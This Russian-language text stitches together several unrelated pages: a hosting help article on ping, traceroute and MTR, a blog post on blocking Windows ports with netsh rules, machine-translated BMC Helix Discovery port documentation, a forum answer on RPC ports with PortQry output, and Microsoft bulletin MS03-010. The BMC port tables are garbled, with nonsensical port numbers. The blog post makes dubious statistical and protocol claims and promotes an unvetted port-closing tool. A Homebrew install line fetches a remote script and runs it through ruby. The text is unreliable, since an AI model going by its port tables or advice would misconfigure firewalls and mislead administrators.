Ping — это утилита, с помощью которой можно проверить доступность сервера с компьютера. Опрашиваемому узлу отправляются эхо-запросы (ICMP-пакеты Echo Request). Если до узла дошёл запрос, в ответ он должен отправить ICMP-пакет с принятыми данными и эхо-ответ (Echo Reply). Подробнее в статье Команда Ping.

Traceroute — это утилита, с помощью которой можно отследить путь запроса к серверу, а также проблемы, связанные с доступностью удалённого сервера. Утилита отправляет запрос узлу и последовательно опрашивает все маршрутизаторы на пути. Подробнее о работе утилиты и её установке читайте в статье Утилиты Traceroute и Tracert.

Если у вас кириллический домен

Кириллические домены необходимо вводить в формате Punycode. Для перевода домена в Punycode воспользуйтесь сервисом Whois. Введите имя вашего домена и нажмите Punycode-конвертация.

1.
Нажмите Пуск или сочетание клавиш Win + R.
2.
В поле поиска введите «cmd» и нажмите кнопку ОК.
3.
В окне терминала введите нужную команду:
- ping — ping имя_сайта или ping IP_сервера,
- traceroute — tracert имя_сайта или tracert IP_сервера.

1.
Запустите терминал. Для этого в поисковой строке введите слово «Терминал» или нажмите комбинацию клавиш Ctrl+Alt+T.
2.
В открывшемся окне терминала введите нужную команду:
- ping — ping имя_сайта или ping IP_сервера,
- traceroute — traceroute имя_сайта или traceroute IP_сервера.

1.
Найдите в Spotlight утилиту Network Utility (Сетевая утилита) и запустите её.
2.
В открывшейся программе выберите нужную вкладку:
- ping — на вкладке «Ping» введите имя домена или IP-адрес и нажмите кнопку Ping:
- traceroute — на вкладке «Traceroute» введите имя домена или IP-адрес и нажмите кнопку Trace:

Готово, мы рассмотрели, как пользоваться командой ping и как запустить tracert.

Результатом работы каждой из этих команд будет несколько строк в окне терминала. Результат команды ping покажет количество переданных и потерянных пакетов при обмене с узлом, а также время приёма и передачи. Результатом traceroute будет трассировка маршрута к узлу.

Вы можете скопировать полученный результат или прислать скриншот с результатом исполнения в службу поддержки.

MTR — программа, которая сочетает функционал команд traceroute и ping в одном инструменте. MTR проверяет соединение между локальной системой и указанным узлом (IP или доменом). Программа отправляет запрос к узлу, как команда ping, и показывает маршрут пакета, как traceroute.

Диагностика сети WinMTR:

1. Скачайте дистрибутив WinMTR.
2.
Распакуйте архив и запустите программу от имени администратора:
3.
Нажмите Options, в настройках отключите галочку Resolve names. Нажмите OK:
4.
В поле «Host» введите ваше доменное имя или IP-адрес. Нажмите Start:
5.
Когда число отправленных пакетов (колонка «Sent») будет более 200, нажмите Stop:
6.
Нажмите Export TEXT и сохраните результат работы программы:

Результат работы содержит:

Hostname — IP-адрес или домен узла. Значение «No response from host» говорит о блокировке ICMP-пакетов в узле;
Loss % — процент потерянных ответов от данного узла. Например, при «No response from host» процент потерь равен 100 — значит, маршрутизатор не ответил на ICMP-запрос;
Sent — количество отправленных запросов узлу;
Recv — количество полученных ответов от узла;
Best — наименьшее время задержки, мс;
Avrg — среднее время задержки, мс;
Worst — наибольшее время задержки, мс;
Last — время задержки последнего полученного пакета, мс.

На Linux утилита MTR установлена по умолчанию.

1.
Запустите терминал. Для этого в поисковой строке введите слово «Терминал» или нажмите комбинацию клавиш Ctrl+Alt+T.
2.
Если утилита MTR не установлена, введите команды:
- для Ubuntu/Debian: sudo apt install mtr
- для CentOS: sudo yum install mtr
- для Fedora: sudo dnf install mtr
3.
Введите команду:
mtr -n -c 300 -r 123.123.123.123
Где 123.123.123.123 — IP-адрес вашего сайта.
4.
Дождитесь окончания выполнения запроса. В окне терминала вы увидите результат работы утилиты MTR:

Результат работы содержит:

HOST — IP-адрес или домен узла. Значение «???» говорит о блокировке ICMP-пакетов в узле;
Loss% — процент потерянных ответов от данного узла. Например, при «???» процент потерь равен 100 — значит, маршрутизатор не ответил на ICMP-запрос;
Snt — количество отправленных запросов узлу;
Last — время задержки последнего полученного пакета, мс;
Avg — среднее время задержки, мс;
Best — наименьшее время задержки, мс;
Wrst — наибольшее время задержки, мс;
StDev — среднеквадратичное отклонение времени задержки, мс.

В MacOS MTR не установлена по умолчанию. Чтобы установить MTR вручную:

1.
Запустите терминал. Для этого нажмите Cmd + Пробел, в поисковой строке введите слово «Терминал» и нажмите Enter.
2.
Если у вас не установлен пакетный менеджер Brew, установите его командой:
ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" /dev/null
Для выполнения команды укажите пароль пользователя. При успешном результате появится уведомление с текстом «Installation successful!»
3.
Затем установите MTR командой:
brew install mtr
4.
После установки запустите MTR:
sudo /usr/local/sbin/mtr yourdomain.com
Где yourdomain.com — ваш домен. Для выполнения команды также потребуется ввести пароль пользователя.
5.
Подождите примерно 10 минут, пока MTR отправит около 300 пакетов и соберёт информацию о задержках и потерях. В окне терминала вы увидите результат работы утилиты MTR:

Результат должен содержать:
- Host — IP-адрес или домен узла. Значение «???» говорит о блокировке ICMP-пакетов в узле;
- Loss % — процент потерянных ответов от данного узла. Например, при «???» процент потерь равен 100 — значит, маршрутизатор не ответил на ICMP-запрос;
- Snt — количество отправленных запросов узлу;
- Last — время задержки последнего полученного пакета, мс;
- Avg — среднее время задержки, мс;
- Best — наименьшее время задержки, мс;
- Wrst — наибольшее время задержки, мс;
- StDev — среднеквадратичное отклонение времени задержки, мс.

Если вы обнаружили потери на промежуточных узлах, проблемы нет. Промежуточные маршрутизаторы могут не отвечать на ICMP-запросы, а просто пропускать дальше трафик. Если же потери обнаружены на конечном узле, отправьте результат работы программы в службу поддержки. В сообщении укажите ваш внешний IP-адрес. Узнать IP-адрес можно на сайте REG.RU.

Журналы сайтов расположены в корневой директории хостинга в папке logs. Логи хостинга можно просмотреть как через хостинг-панели управления, так и по FTP и SSH. Подробнее о том, что такое логи, зачем они нужны и как их читать мы описали в статье Логи сервера.

В панели управления хостингом

1. Войдите в панель управления хостингом.
2.
Перейдите в Менеджер файлов, а затем в директорию logs:
3.
Для просмотра журнала скачайте необходимый файл на локальный ПК. Для этого выделите строку с названием журнала и нажмите кнопку Скачать:

1. Войдите в панель управления хостингом.
2.
В разделе «Файлы» нажмите Диспетчер файлов:
3.
Кликните на папку logs:
4.
Для просмотра журнала скачайте необходимый файл на локальный ПК. Для этого выделите строку с названием журнала и нажмите кнопку Скачать:

1. Войдите в панель управления хостингом.
2.
Перейдите во вкладку «Файлы», а затем в директорию logs:
3.
Для просмотра журнала скачайте необходимый файл на локальный ПК. Для этого выделите строку с названием журнала и нажмите кнопку Скачать:

По FTP или SSH

Помогла ли вам статья?

300 раз уже
помогла

Как закрыть порты Windows |

Автор поста: VPNHOOK

Каждый день владельцы ПК сталкиваются с огромным количеством опасных программ и вирусов, которые так или иначе попадают на жесткий диск и становятся причиной утечки важных данных, поломки компьютера, кражи важной информации и других неприятных ситуаций.
Чаще всего заражаются компьютеры, работающие на ОС Windows любых версий, будь то 7, 8, 10 или любая другая. Главная причина такой статистики – входящие подключения к ПК или «порты», которые являются слабым местом любой системы из-за своей доступности по умолчанию.
Слово «порт» – это термин, подразумевающий порядковый номер входящих подключений, которые направляются на ваш ПК от внешнего программного обеспечения. Часто бывает так, что эти порты используют вирусы, запросто проникающие на ваш компьютер при помощи IP-сети.
Вирусное программное обеспечение, попав в компьютер через такие входящие подключения, быстро заражает все важные файлы, причём не только пользовательские, но и системные. Чтобы этого избежать, мы рекомендуем закрыть все стандартные порты, которые могут стать вашим уязвимым местом при атаке хакеров.
Какие порты у Windows 7-10 самые уязвимые?
Многочисленные исследования и опросы специалистов показывают, что до 80% вредоносных атак и взломов происходили при помощи четырех основных портов, использующихся для быстрого обмена файлами между разными версиями Windows:
TCP порт 139, необходимый для удаленного подключения и управления ПК;
TCP порт 135, предназначенный для выполнения команд;
TCP порт 445, позволяющий быстро передавать файлы;
UDP порт 137, с помощью которого проводится быстрый поиск на ПК.
Закрываем порты 135-139 и 445 в Виндовс
Мы предлагаем вам ознакомиться с самыми простыми способами закрытия портов Виндовс, которые не требуют дополнительных знаний и профессиональных навыков.
Используем командную строку
Командная строка Windows – это программная оболочка, которая используется для задания определенных функций и параметров софту, не имеющему собственной графической оболочки.
Для того чтобы запустить командную строку, необходимо:
Одновременно нажать сочетание клавиш Win+R
В появившейся командной строке ввести CMD
Нажать на кнопку «ОК»
Появится рабочее окно с чёрным фоном, в котором необходимо поочередно вводить нижеприведенные команды. После каждой введенной строчки нажимайте клавишу Enter для подтверждения действия.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=»Block1_TCP-135″ (команда для закрытия порта 135)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=»Block1_TCP-137″ (команда для закрытия порта 137)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=»Block1_TCP-138″ (команда для закрытия порта 138)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=»Block_TCP-139″ (команда для закрытия порта 139)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=»Block_TCP-445″ (команда для закрытия порта 445)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=»Block_TCP-5000″
Шесть приведенных нами команд необходимы для: закрытия 4х уязвимых TCP-портов Windows (открытых по умолчанию), закрытия UDP-порта 138, а также закрытия порта 5000, который отвечает за выведение списка доступных сервисов.
Закрываем порты сторонними программами
Если вы не хотите тратить время на работу с командной строкой, мы предлагаем вам ознакомиться со сторонними приложениями. Суть такого софта заключается в правке реестра в автоматическом режиме с графическим интерфейсом, без необходимости в ручном введении команд.
По мнению наших пользователей, самой популярной программой для этих целей является Windows Doors Cleaner. Она поможет с лёгкостью закрыть порты на компьютере с ОС Windows 7/8/8.1/10. Более старые версии операционных систем, к сожалению, не поддерживаются.
Как работать с программой, закрывающей порты
Для того чтобы воспользоваться Windows Doors Cleaner, необходимо:
1. Скачать софт и установить его
2. Запустить программу, нажав на ярлык правой кнопкой мыши и выбрав «запустить от имени администратора»
3. В появившемся рабочем окне будет список портов и кнопки «Сlose» или «Disable», которые закрывают уязвимые порты Windows, а также любые другие по желанию
4. После того, как необходимые изменения были внесены, необходимо перезагрузить систему
Ещё одним преимуществом программы является тот факт, что порты с её помощью можно не только закрывать, но и открывать.
Делаем выводы
Закрытие уязвимых сетевых портов в Виндовс – это не панацея от всех бед. Важно помнить, что сетевая безопасность может быть достигнута только комплексными действиями, нацеленными на закрытие всех уязвимостей вашего ПК.
Для безопасности Windows пользователь в обязательном порядке должен устанавливать критические обновления от Microsoft, иметь лицензированных антивирусный софт и включенный файервол, использовать исключительно безопасное программное обеспечение и регулярно читать наши статьи, в которых рассказываем обо всех существующих способах достижения анонимности и безопасности ваших данных.
Вы знаете более удобные способы закрыть сетевые порты? Поделитесь своими знаниями в комментариях и не забывайте репостить статью к себе на страничку. Делитесь полезной информацией со своими друзьями и не дайте хакерам шанса навредить вашим близким!

Сетевые порты, используемые для связи для обнаружения — Документация для BMC Helix Discovery

В этом разделе описывается связь между BMC Helix Discovery Outpost и целями обнаружения. Он содержит следующие разделы:
Обнаружение базового устройства
Для повышения эффективности BMC Helix Discovery Outpost использует эхо-запрос ICMP для обнаружения устройства. Если в вашей среде подавляется эхо-запрос ICMP, можно использовать другие методы проверки связи. Для этого на вкладке Administration прокрутите вниз до раздела Discovery и щелкните Discovery Configuration .В разделе Сканирование включите Использовать TCP ACK «ping» перед сканированием. и Использовать TCP SYN «ping» перед сканированием флажков и введите номера портов в TCP-портах, которые будут использоваться для начального сканирования, и UDP-порты для использования. для полей начального сканирования.

Если вы не разрешите пинги ICMP через брандмауэр и не включите TCP Ack и Synping, вы можете потерять производительность. Это связано с тем, что система выполняет полное сканирование порта nmap «методом доступа», чтобы определить, присутствует ли хост на самом деле, что вызывает задержки, поскольку он ожидает запросов до тайм-аута.В этой ситуации вы должны изменить настройку «Пинговать хосты перед сканированием» на «Нет». Если существует ограниченный диапазон IP-адресов, для которых подавлено эхо-запрос ICMP, вы можете отключить поведение ping для этих IP-адресов с помощью параметра Исключить диапазоны из ping. Дополнительные сведения см. В разделе Настройка параметров обнаружения.
Для сканирования сетей, которые не разрешают пинг-пакеты ICMP, вы можете установить Использовать пинг TCP ACK перед сканированием или Использовать пинг TCP SYN перед сканированием (или обоих) в настройках обнаружения на Да .Если BMC Helix Discovery пингует IP-адрес, на котором нет устройства, и какой-то брандмауэр в вашей среде настроен на ответ для этого IP-адреса, это может привести к сообщению об устройстве, которого нет в сети, а не о темном пространстве (NoResponse). Чтобы избежать этого, рекомендуется либо изменить такие конфигурации брандмауэра, либо не включать пинг TCP ACK или пинг TCP SYN.
Если BMC Helix Discovery не может подключиться к конечной точке, он использует эвристические методы для оценки присутствующего устройства.Этим можно управлять с помощью параметров в разделе «Настройка параметров обнаружения».
Порт 4, использующий TCP и UDP, необходим при использовании IP Fingerprinting, поскольку обнаружение должно отслеживать ответ от гарантированно закрытого порта на конечной точке.
Порт 4 должен быть закрыт на цели обнаружения, но должен быть открыт на любом межсетевом экране между устройством и целью обнаружения, чтобы ответ был от цели, а не от межсетевого экрана. Если это не так, эвристика получает ответ от двух разных стеков TCP / IP, что приводит к непредсказуемым результатам, включая классификацию конечной точки как брандмауэра или нераспознанного устройства.Это может привести к пропуску устройств (см. UnsupportedDevice на странице DiscoveryAccess).
Порты, перечисленные в следующей таблице, используются для определения присутствующего устройства.
SSH
3940
Discovery
Номер порта
Назначение порта
4
Закрытый порт
21
FTP
5
23
telnet
80
HTTP
135
Windows RPC
0
Windows RPC
0
Windows RPC
443 HTTPS
513
rlogin
902 VMware Authentication Daemon
3940
3940
5988 WBEM HTTP
5989 WBEM HTTPS
Порты SNMP, используемые для обнаружения
Единственный порт, необходимый для обнаружения SNMP, — это 161 UDP.
Порты UNIX, используемые для обнаружения
Минимальный порт, необходимый для успешного обнаружения UNIX, — это просто порт, связанный с используемыми вами методами доступа. Например, если вы используете только ssh, это будет порт 22. В следующей таблице подробно описаны назначения для каждого номера порта.
Номер порта
Назначение порта
22
SSH
23
telnet
telnet
Порты Windows, используемые для обнаружения
В этом разделе описаны порты, которые BMC Discovery Outpost использует при обнаружении удаленных целей Windows.Если вы намереваетесь обнаруживать хосты за брандмауэром, вы должны открыть эти порты в брандмауэре. Указанные порты являются исходящими (от прокси Windows и устройства) TCP-портами. Цели Windows и порт 135 Outpost сканирует порт 135, чтобы определить, открыт ли порт. Если порт 135 открыт, целью, скорее всего, будет хост Windows, и дальнейшее обнаружение будет выполнено соответствующим образом. Вы можете отключить сканирование порта 135. В этом случае BMC Helix Discovery предполагает, что все цели являются хостами Windows. Чтобы отключить сканирование порта 135:
Выберите Administration> Discovery> Discovery Configuration .
Выберите Нет в Проверьте порт 135 перед использованием методов доступа Windows Поле .
PowerShell
Вся связь PowerShell от устройства BMC Helix Discovery, BMC Discovery Outpost или прокси-сервера Windows AD отправляется по HTTP или HTTPS с использованием обычных портов PowerShell, а не стандартных веб-портов (443/80).
Порты, используемые при обнаружении PowerShell, и соответствующие назначения описаны в следующей таблице.
Номер порта
Назначение порта
5985
PowerShell HTTP
5986
02 5986
WMI
Все сообщения WMI от BMC Helix Discovery отправляются с включенной конфиденциальностью пакетов. Если обнаруживаемый узел не поддерживает конфиденциальность пакетов, флаг игнорируется, и WMI возвращает запрошенную информацию (например, если вы используете более раннюю версию, чем Windows Server 2003 с пакетом обновления 1 (SP1)).В случаях, когда указан диапазон, один из портов используется после первоначального согласования.
По умолчанию WMI (DCOM) использует случайно выбранный порт TCP между 1024 и 65535. Чтобы упростить настройку брандмауэра, следует ограничить это использование при сканировании через брандмауэры. Для получения дополнительной информации см. Настройку диапазона порта DCOM.
Порты, используемые методами обнаружения WMI, и соответствующие назначенные порты описаны в следующей таблице.
0
9005 9005
Номер порта
Назначение порта
135
DCE RPC Endpoint Manager
DCOM Service Control
1024-1024 DCOM с ограничениями
49152-65535
DCOM с неограниченным доступом
139
Служба сеансов Netbios
445
Домены в стиле Windows NT4 и NT4 (WMI)
TCP 139 требуется вместо TCP 445, если вы обнаружите NT4 или аутентифицируетесь в домене NT4, отличном от AD (например, в домене, запущенном с использованием Samba 3.x или более ранней версии).
TCP 139 — это служба сеансов NetBIOS. Некоторые версии Windows (особенно 9x / NT4) запускают SMB в NetBIOS через TCP, используя порт 139. В более новых версиях по умолчанию SMB запускается непосредственно через TCP через порт 445. Windows XP / 2003 / Vista / 2008 и более поздние версии и сети Active Directory используют SMB напрямую через TCP 445.
Запросы WMI от Windows Server 2008 к хосту Windows NT4 завершаются ошибкой с использованием настроек безопасности по умолчанию. На прокси-узле Windows отключите требование 128-битной безопасности в политике «Сетевая безопасность: минимальная безопасность сеанса для клиентов на основе NTLM SSP (включая RPC)», чтобы разрешить это.
Диапазон портов DCOM
WMI основан на объектной модели распределенных компонентов (DCOM), которая по умолчанию использует для связи случайно выбранный порт TCP от 1024 до 65535. Чтобы сделать это более эффективным для брандмауэров, диапазон можно ограничить, используя следующую процедуру на каждом целевом хосте. Дополнительные сведения об этой проблеме см. В разделе Как настроить динамическое выделение портов RPC для работы с брандмауэрами.
Эти настройки должны быть ограничены на целевом хосте, а не на хосте BMC Helix Outpost.

Чтобы установить диапазон порта DCOM:.
С помощью редактора реестра создайте раздел HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Rpc \ Internet
Внутри этого раздела создайте REG_MULTI_SZ (многострочное значение) с именем Ports.
Укажите порт или диапазон портов для использования.
Прокси-сервер Windows использует только один порт. Однако, если у пользователя есть другие приложения DCOM, используемые на этом компьютере, вам может потребоваться включить больший диапазон.
Создайте REG_SZ (строковое значение) с именем PortsInternetAvailable и присвойте ему значение Y .
Создайте REG_SZ (строковое значение) с именем UseInternetPorts и присвойте ему значение Y .
Перезагрузите компьютер.
RemQuery
Хотя WMI является стандартным механизмом для удаленного опроса системы и управления ею от Microsoft. Однако некоторые операции с помощью WMI невозможны. В первую очередь данные netstat при обнаружении ядра и выполнении любых дополнительных команд или извлечении содержимого файла с помощью шаблонов. Без RemQuery невозможно определить информацию о сетевом подключении для цели обнаружения, обмен данными между этим хостом и другими, а также моделирование приложений на основе сетевых подключений.Дополнительные операции обнаружения с использованием RemQuery обычно предназначены для более глубокого обнаружения, моделирования и управления версиями программного обеспечения.
RemQuery — это служебная программа BMC Helix Discovery, использующая тот же базовый подход, что и инструмент Microsoft PSExec. Прокси-сервер копирует исполняемый файл RemQuery в общий ресурс ADMIN $ на целевом компьютере. Доступ администратора Windows необходим для записи в общий ресурс ADMIN $ и запуска службы RemQuery. После запуска службы на целевом сервере прокси-сервер отправляет свой открытый ключ службе RemQuery, которая генерирует ключ шифрования, шифрует его полученным открытым ключом и затем отправляет обратно.Затем прокси восстанавливает ключ шифрования, используя свой закрытый ключ. С этого момента вся связь через прокси-сервер с RemQuery будет защищена с помощью ключа шифрования и соответствующего алгоритма, в зависимости от целевой системы. Обнаружение RemQuery использует шифрование AES с 256-битным ключом. AES не поддерживается в Windows 2000, поэтому обнаружение RemQuery возвращается к шифрованию DES. Windows NT не поддерживает AES или DES, поэтому обнаружение RemQuery не зашифровано. Прокси-сервер связывается со службой RemQuery с помощью именованного канала.Этот канал защищен, поэтому к нему может получить доступ только администратор.
Порты, используемые при обнаружении RemQuery, и соответствующие назначения портов описаны в следующей таблице.
Номер порта
Назначение порта
139
Служба сеанса Netbios
445
445
Microsoft
Домены в стиле Windows NT4 и NT4 (RemQuery)
TCP 139 требуется вместо TCP 445, если вы обнаружите NT4 или аутентифицируетесь в домене NT4, отличном от AD, например, в домене, запущенном с использованием Samba 3.x или более ранней версии.
TCP 139 — это служба сеансов NetBIOS. Некоторые версии Windows (особенно 9x / NT4) запускают SMB в NetBIOS через TCP, используя порт 139. В более новых версиях по умолчанию SMB запускается непосредственно через TCP через порт 445. Windows XP / 2003 / Vista / 2008 и более поздние версии и сети Active Directory используют SMB напрямую через TCP 445.
Порты мэйнфрейма, используемые для обнаружения
Единственный порт, необходимый для обнаружения мэйнфрейма, — это 3940 TCP. Дополнительные сведения о настройке этого порта см. В разделе Конфигурация обнаружения.
Порты WBEM, используемые для обнаружения
Порты по умолчанию, используемые для обнаружения WBEM, описаны в следующей таблице. Дополнительные сведения о настройке этого порта см. В разделе Конфигурация обнаружения.
0
Номер порта
Назначение порта
5988
HTTP
5989
HTTPS
Порты, необходимые для расширенного обнаружения В следующих разделах содержится подробная информация о портах для расширенных типов обнаружения.
Обнаружение SQL
Информация о порте, используемая для обнаружения SQL, получена из шаблонов, используемых для обнаружения конкретной базы данных. Это зависит от способа настройки баз данных в вашей организации. В следующей таблице приведены порты по умолчанию.
Номер порта
Назначение порта
Использование
1521
SQL
46
SQL
46
SQL
MS SQL
4100
SQL
Sybase ASE
3306
SQL
5
SQL
5
SQL
5
Обнаружение VMware ESX / ESXi с помощью vCenter
Порты, необходимые для обнаружения хостов VMware ESX / ESXi с помощью vCenter, перечислены в следующей таблице.
Обнаружение vCenter
Обнаружение vCenter использует стандартное обнаружение хоста с созданием vCenter SI, запускаемого в обнаруженном процессе vCenter.
Номер порта
Назначение порта
Использовать
443
HTTPS по умолчанию
9000 ESWare HTTPS порт
Обнаружение VMware ESX / ESXi с помощью vSphere
Порты, необходимые для обнаружения хостов VMware ESX / ESXi, перечислены в следующей таблице.
Номер порта
Назначение порта
Использование
443
HTTPS
VMware ESX / ESXi
2
02
02 VMware ESX / ESXi
2
02
02 vSphere API
VMware ESX / ESXi
netbios — Какова последовательность портов Windows RPC 135, 137, 139 (и выше)? Что изменится с портом 145?
Эта статья в TechNet великолепна, я рекомендую вам добавить ее в закладки.В нем довольно подробно перечислены порты, используемые различными службами Windows.
В версиях Windows до Vista / 2008 NetBIOS использовалась для службы «RPC Locator», которая управляла базой данных службы имен RPC. Но в Vista / 2008 и последующих версиях служба RPC Locator больше не нужна или полезна. Это рудиментарно. С этого момента я буду говорить только о MSRPC в Vista / 2008 +.
Порты 137, 138 и 139 предназначены для NetBIOS, а не требуются для работы MSRPC.
Все порты, используемые RPC, следующие:
RPC EPM TCP 135 RPC через HTTPS TCP 593 SMB (для именованных каналов) TCP 445 Эфемерный диапазон, динамический *
Другие приложения, такие как шлюз удаленного рабочего стола, будут использовать RPC через прокси-сервер HTTP и использовать порт 443 и т. Д.
Хотя в статье, на которую я ссылался выше, перечислены порты NetBIOS, они являются устаревшими и не требуются для RPC, при условии, что вы можете получить разрешение имен с помощью других средств (DNS) и при условии, что сама удаленная служба не зависит от NetBIOS.
Порт 145 фиктивный. Он ни для чего не используется. Где бы вы ни слышали, что это «улучшает положение», это неправильно.
Basic MSRPC использует порты 135 и динамический диапазон с высокими номерами. Этот динамический диапазон с высокими номерами — это порты 1024-5000 в XP / 2003 и ниже и 49152-65535 в Vista / 2008 и выше. Вы также можете вызвать временные порты этого диапазона портов.
Вы можете определить собственный диапазон портов, если хотите, например:
reg добавить HKLM \ SOFTWARE \ Microsoft \ Rpc \ Internet / v Ports / t REG_MULTI_SZ / f / d 8000-9000 reg add HKLM \ SOFTWARE \ Microsoft \ Rpc \ Internet / v PortsInternetAvailable / t REG_SZ / f / d Y reg add HKLM \ SOFTWARE \ Microsoft \ Rpc \ Internet / v UseInternetPorts / t REG_SZ / f / d Y
и / или
netsh int ipv4 set dynamicport tcp start = 8000 num = 1001 netsh int ipv4 установить динамический порт udp start = 8000 num = 1001 netsh int ipv6 установить динамический порт tcp start = 8000 num = 1001 netsh int ipv6 установить динамический порт udp start = 8000 num = 1001
TCP-порт 135 является сопоставителем конечных точек MSRPC.Вы можете привязаться к этому порту на удаленном компьютере анонимно и либо перечислить все службы (конечные точки), доступные на этом компьютере, либо запросить, на каком порту работает конкретная служба, если вы знаете, что ищете.
Позвольте мне показать вам пример запроса к RPC Enpoint Mapper:
C: \> PortQry.exe -n 192.168.1.1 -e 135 Запрос целевой системы называется: 192.168.1.1 Попытка преобразовать IP-адрес в имя ... IP-адрес преобразован в host01.labs.myotherpcisacloud.com запрос ... TCP-порт 135 (служба epmap): ПРОСЛУШИВАНИЕ Использование эфемерного порта источника Запрос базы данных сопоставителя конечных точек ... Ответ сервера: UUID: d95afe70-a6d5-4259-822e-2c84da1ddb0d ncacn_ip_tcp: 192.168.1.1 [49152] UUID: 12345778-1234-abcd-ef00-0123456789ac ncacn_np: 192.168.1.1 [\\ pipe \\ lsass] UUID: 12345778-1234-abcd-ef00-0123456789ac ncacn_ip_tcp: 192.168.1.1 [49159] UUID: 6b5bdd1e-528c-422c-af8c-a4079be4fe48 API удаленного Fw ncacn_ip_tcp: 192.168.1.1 [49158] UUID: 367abb81-9844-35f1-ad32-98f038001003 ncacn_ip_tcp: 192.168.1.1 [49157] UUID: 12345678-1234-abcd-ef00-0123456789ab ncacn_ip_tcp: 192.168.1.1 [49155] UUID: 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1 ncacn_ip_tcp: 192.168.1.1 [49155] UUID: ae33069b-a2a8-46ee-a235-ddfd339be281 ncacn_ip_tcp: 192.168.1.1 [49155] UUID: 4a452661-8290-4b36-8fbe-7f4093a94978 ncacn_ip_tcp: 192.168.1.1 [49155] UUID: 76f03f96-cdfd-44fc-a22c-64950a001209 ncacn_ip_tcp: 192.168.1.1 [49155] UUID: 7f1343fe-50a9-4927-a778-0c5859517bac Служба DfsDs ncacn_np: 192.168.1.1 [\\ PIPE \\ wkssvc] UUID: 3473dd4d-2e88-4006-9cba-22570909dd10 WinHttp Auto-Proxy Service ncacn_np: 192.168.1.1 [\\ PIPE \\ W32TIME_ALT] UUID: 1ff70682-0a51-30e8-076d-740be8cee98b ncacn_np: 192.168.1.1 [\\ PIPE \\ atsvc] ... Всего найдено конечных точек: 50 ==== Конец ответа на запрос сопоставителя конечных точек RPC ====
Вы заметите, что если вы выполните этот запрос на локальном компьютере, вы найдете гораздо больше конечных точек, чем если бы вы выполняли запрос с удаленного компьютера. Это связано с тем, что многие конечные точки RPC не доступны удаленно и используются только для локального межпроцессного взаимодействия.
Дополнительная литература: http: // technet.microsoft.com/en-us/library/cc738291(v=WS.10).aspx
А также: https://www.myotherpcisacloud.com/post/2014/02/16/verifying-rpc-network-connectivity-like-a-boss.aspx
Бюллетень по безопасности Microsoft MS03-010 — Важно
11.10.2017
11 минут на чтение
В этой статье
Бюллетень по безопасности
Ошибка в сопоставлении конечных точек RPC делает возможным отказ в обслуживании (331953)
Опубликовано: 26 марта 2003 г. | Обновлено: 13 мая 2003 г.
Версия: 1.1
Первоначально опубликовано: 26 марта 2003 г.
Обновлено: 13 мая 2003 г.
Сводка
Кому следует прочитать этот бюллетень: Клиенты, использующие Microsoft® Windows® NT 4.0, Windows 2000 или Windows XP
Воздействие уязвимости: Отказ в обслуживании
Максимальный рейтинг серьезности: Важно
Рекомендация: Клиенты должны установить патч при первой возможности
Затронутое программное обеспечение:
Microsoft Windows NT 4
Microsoft Windows 2000
Microsoft Windows XP
Общая информация
Технические характеристики
Техническое описание:
Примечание:
Сообщалось, что применение этого исправления безопасности в некоторых конкретных конфигурациях приводит к тому, что локальные вызовы COM перестают отвечать.Эта проблема возникает только тогда, когда несколько локальных вызовов RPC выполняются быстро из нескольких потоков, и каждый поток имеет уникальный набор учетных данных безопасности. Поддерживаемое исправление теперь доступно от Microsoft. Дополнительные сведения об этом и сведения о получении исправления см. В статье 814119.
базы знаний Майкрософт.
Удаленный вызов процедур (RPC) — это протокол, используемый операционной системой Windows. RPC обеспечивает механизм межпроцессного взаимодействия, который позволяет программе, работающей на одном компьютере, беспрепятственно выполнять код в удаленной системе.Сам протокол является производным от протокола RPC OSF (Open Software Foundation), но с добавлением некоторых специфических расширений Microsoft.
В части RPC есть уязвимость, связанная с обменом сообщениями через TCP / IP. Сбой возникает из-за неправильной обработки некорректных сообщений. Эта конкретная уязвимость влияет на процесс сопоставления конечных точек RPC, который прослушивает порт TCP / IP 135. Сопоставитель конечных точек RPC позволяет клиентам RPC определять номер порта, назначенный в настоящее время конкретной службе RPC.
Чтобы воспользоваться этой уязвимостью, злоумышленнику необходимо установить TCP / IP-соединение с процессом Endpoint Mapper на удаленном компьютере. После установления соединения злоумышленник начнет согласование RPC-соединения перед передачей искаженного сообщения. На этом этапе процесс на удаленной машине завершится ошибкой. Процесс сопоставления конечных точек RPC отвечает за поддержание информации о подключении для всех процессов на этом компьютере, использующих RPC. Поскольку Endpoint Mapper работает в самой службе RPC, использование этой уязвимости может привести к сбою службы RPC с сопутствующей потерей всех служб на основе RPC, предлагаемых сервером, а также с потенциальной потерей некоторых функций COM.
В этом бюллетене Microsoft предоставила исправления для исправления этой уязвимости для Windows 2000 и Windows XP. Хотя Windows NT 4.0 подвержена этой уязвимости, Microsoft не может предоставить исправление для этой уязвимости для Windows NT 4.0. Архитектурные ограничения Windows NT 4.0 не поддерживают изменения, которые потребуются для устранения этой уязвимости. Пользователям Windows NT 4.0 настоятельно рекомендуется использовать обходной путь, описанный в FAQ ниже, который предназначен для защиты NT 4.0 с брандмауэром, который блокирует порт 135.
Смягчающие факторы:
Чтобы воспользоваться этой уязвимостью, злоумышленнику потребуется возможность подключиться к Endpoint Mapper, запущенному на целевой машине. Для сред интрасети Endpoint Mapper обычно доступен, но для компьютеров, подключенных к Интернету, порт, используемый Endpoint Mapper, обычно блокируется брандмауэром. В случае, если этот порт не заблокирован или в конфигурации интрасети, злоумышленнику не потребуются какие-либо дополнительные привилегии.
Лучшие практики рекомендуют блокировать все порты TCP / IP, которые фактически не используются. По этой причине на большинстве компьютеров, подключенных к Интернету, должен быть заблокирован порт 135. RPC через TCP не предназначен для использования во враждебных средах, таких как Интернет. Для враждебных сред предоставляются более надежные протоколы, такие как RPC через HTTP. Чтобы узнать больше о защите RPC для клиента и сервера, посетите http://msdn2.microsoft.com/en-us/library/Aa379441. Чтобы узнать больше о портах, используемых RPC, перейдите по адресу http: // www.microsoft.com/technet/prodtechnol/windows2000serv/reskit/cnet/cnfc_por_simw.mspx?mfr=true
